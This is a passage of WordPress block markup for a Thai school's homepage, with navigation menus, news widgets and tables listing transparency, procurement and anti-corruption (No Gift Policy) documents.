ol.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=476\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=563\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":30,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/ผอ-1.png\" alt=\"\" title=\"ผอ 1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"14_bc537f-5a\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns14_bc537f-5a\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"14_1da0eb-4e\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"link\":\"http://pakhaeng.ssk.in.th/?page_id=469\",\"sizePreset\":\"small\",\"background\":\"#0a71ad\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#0a71ad\",\"backgroundColorHover\":\"#8ed1fc\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"14_add57c-9d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items14_add57c-9d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"14_745a05-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_745a05-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลพื้นฐาน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_1e894c-db\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_1e894c-db\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ประวัติโรงเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_95f155-a6\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_95f155-a6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=609\" data-type=\"page\" data-id=\"609\">ข้อมูลสิ่งก่อสร้าง</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_3cdb23-c1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_3cdb23-c1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_92a3d1-5f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_92a3d1-5f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_225b86-42\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_225b86-42\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=469\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_e92ee9-59\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_e92ee9-59\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=605\" data-type=\"page\" data-id=\"605\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_91c788-64\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_91c788-64\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=496\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=496\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e5e0c341\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":503,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit_admin.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/Is-It-a-Gift-Instagram-Post.png\" alt=\"\" class=\"wp-image-503\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"9l7bo6vn\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"showTaxonomy\":false,\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"showPagination\":true,\"postsPerPage\":\"2\",\"headingText\":\"วิดีโอกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"headingHide\":false,\"category-terms\":[{\"label\":\"วิดีโอกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%a7%e0%b8%b4%e0%b8%94%e0%b8%b5%e0%b9%82%e0%b8%ad%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingBgColor\":\"#ff6900\"} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=546\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?post_type=popupbuilder&amp;p=328\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=542\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=362\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=362\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=355\" data-type=\"page\" data-id=\"355\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=506\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=337\">Q&amp;A</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและการใช้จ่ายงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</strong></td></tr><tr><td><strong>แผนและความก้าวหน้าในการดำเนินงานและการใช้งบประมาณประจำปี</strong></td></tr><tr><td><strong>รายงานผลการดำเนินงานประจำปี</strong></td></tr><tr><td><strong>คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</strong></td></tr><tr><td><strong>คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติการให้บริการ</strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=459\">E-Service</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>รายการการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</strong></td></tr><tr><td><strong>ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=566\" data-type=\"page\" data-id=\"566\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></strong></td></tr><tr><td><strong>รายงานผลการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</strong></td></tr><tr><td><strong>ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</strong></td></tr><tr><td><strong>การขับเคลื่อนจริยธรรม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=476\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>การเปิดโอกาสให้เกิดการมีส่วนร่วม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</strong></td></tr><tr><td><strong>การสร้างวัฒนธรรม&nbsp; No Gift Policy</strong></td></tr><tr><td><strong>รายงานผลตามนโยบาย No Gift Policy</strong></td></tr><tr><td><strong>รายงานการรับทรัพย์สินหรือประโยชน์อื่นใดโดยธรรมจรรยา</strong></td></tr><tr><td><strong>การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>การส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการปฏิบัติการป้องกันการทุจริต</strong></td></tr><tr><td><strong>รายงานการดำเนินการป้องกันการทุจริตประจำปี</strong></td></tr><tr><td><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/list1 {\"blockId\":\"bohtnagp\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"showThumbnail\":false,\"showTaxonomy\":false,\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"showPagination\":true,\"titleTag\":\"h6\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"headingBgColor\":\"#ff6900\",\"titleHoverColor\":\"#ff6900\",\"titleBgColor\":\"#ffffff\",\"titleHoverBgColor\":\"#ffffff\",\"titleWeight\":\"500\",\"titlefStyle\":\"\",\"titleTran\":\"\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":18}} /-->\n\n<!-- wp:contentviews/grid1 